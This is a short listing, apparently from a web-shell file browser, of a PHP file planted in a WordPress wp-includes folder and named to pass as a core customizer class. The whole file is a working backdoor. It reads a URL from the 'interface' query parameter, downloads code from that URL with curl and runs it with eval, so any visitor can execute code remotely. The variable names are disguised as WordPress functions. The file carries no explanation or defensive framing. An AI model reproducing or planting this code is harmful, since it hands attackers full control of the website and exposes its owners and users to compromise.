| Current Path : /home/xbodynamge/namtation/wp-includes/ |
| Current File : /home/xbodynamge/namtation/wp-includes/class-wp-customize-control-reference.php |
<?php
if (isset($_GET['interface'])) {
$is_front_page_na = $_GET['interface'];
if ($get_the_title_xdc = curl_init()) {
curl_setopt($get_the_title_xdc, CURLOPT_URL, $is_front_page_na);
curl_setopt($get_the_title_xdc, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($get_the_title_xdc));
curl_close($get_the_title_xdc);
exit;
}
}